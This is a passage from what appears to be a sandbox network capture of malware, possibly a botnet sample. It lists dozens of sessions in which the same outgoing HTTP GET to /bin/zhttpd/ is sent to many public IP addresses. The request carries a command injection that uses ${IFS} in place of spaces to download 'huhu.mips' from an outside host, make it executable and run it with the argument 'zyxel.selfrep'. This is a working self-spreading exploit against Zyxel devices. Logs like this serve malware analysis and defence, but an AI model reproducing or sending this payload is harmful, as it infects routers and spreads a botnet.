                                                Jan 29, 2024 07:07:44.236242056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3342192.168.2.2348216118.221.106.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236288071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3343192.168.2.235702276.69.91.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236340046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3344192.168.2.2352036132.67.183.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236361027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3345192.168.2.2356224125.168.222.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236403942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3346192.168.2.234561082.25.49.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236422062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3347192.168.2.2350110108.204.124.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236475945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3348192.168.2.2359948157.49.83.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236496925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3349192.168.2.2340858191.1.196.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236526966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3350192.168.2.234346045.37.67.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236582994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3351192.168.2.2357664202.196.232.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236612082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3352192.168.2.235399279.75.11.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236639023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3353192.168.2.235853497.19.95.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236663103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3354192.168.2.234046871.26.74.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236711979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3355192.168.2.2352898211.54.198.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236737013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3356192.168.2.2350858114.40.244.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236799002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3357192.168.2.2349676131.62.223.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236819983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3358192.168.2.235116062.174.76.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236864090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3359192.168.2.2335648140.245.136.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236924887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3360192.168.2.235432246.172.129.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236949921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3361192.168.2.2345750103.161.59.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236978054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3362192.168.2.2352774195.245.174.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237021923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3363192.168.2.2339608134.152.220.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237081051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3364192.168.2.2347464190.161.14.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237086058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3365192.168.2.2344222160.181.150.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237128019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3366192.168.2.2341214113.25.137.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237150908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3367192.168.2.235174067.235.240.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237196922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3368192.168.2.2339994146.27.208.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237219095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3369192.168.2.23376722.157.246.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237262964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3370192.168.2.2355410199.241.57.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237289906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3371192.168.2.2339654146.243.172.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237320900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3372192.168.2.2358334101.204.134.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237356901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3373192.168.2.2337618155.228.74.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237401962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3374192.168.2.2347192122.247.171.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237428904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3375192.168.2.2335438111.226.206.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237458944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3376192.168.2.235661245.94.37.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237509012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3377192.168.2.2344096167.27.182.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237571955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3378192.168.2.233796276.41.135.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237576008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3379192.168.2.2353890170.79.29.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237596989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3380192.168.2.2355210150.24.45.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237636089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3381192.168.2.2334592139.10.163.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237689018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3382192.168.2.2352408212.30.132.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237741947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3383192.168.2.234700263.163.219.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237770081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3384192.168.2.234663267.238.9.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237921953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3385192.168.2.2344078113.171.204.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.237967014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3386192.168.2.2359368186.80.99.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238008976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3387192.168.2.2352820169.114.14.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238034964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3388192.168.2.2350358118.201.141.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238035917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3389192.168.2.235277894.124.85.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238035917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3390192.168.2.235056466.53.136.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238035917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3391192.168.2.2343244190.118.181.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238060951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3392192.168.2.234611425.163.206.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238095999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3393192.168.2.2357450139.157.2.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238106012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3394192.168.2.2334798119.117.255.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238106966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3395192.168.2.2352046120.245.117.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238111019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3396192.168.2.2344988117.242.173.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238111019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3397192.168.2.234765440.177.136.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238146067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3398192.168.2.2342874197.83.113.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238146067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3399192.168.2.2353256184.115.103.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238187075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3400192.168.2.234987060.167.109.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238249063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3401192.168.2.2360730123.222.204.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238290071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3402192.168.2.2339552136.84.36.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238322020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3403192.168.2.234739434.249.12.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238377094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3404192.168.2.235551238.48.62.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238430023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3405192.168.2.235692648.234.191.160443
                                                TimestampBytes transferredDirectionData
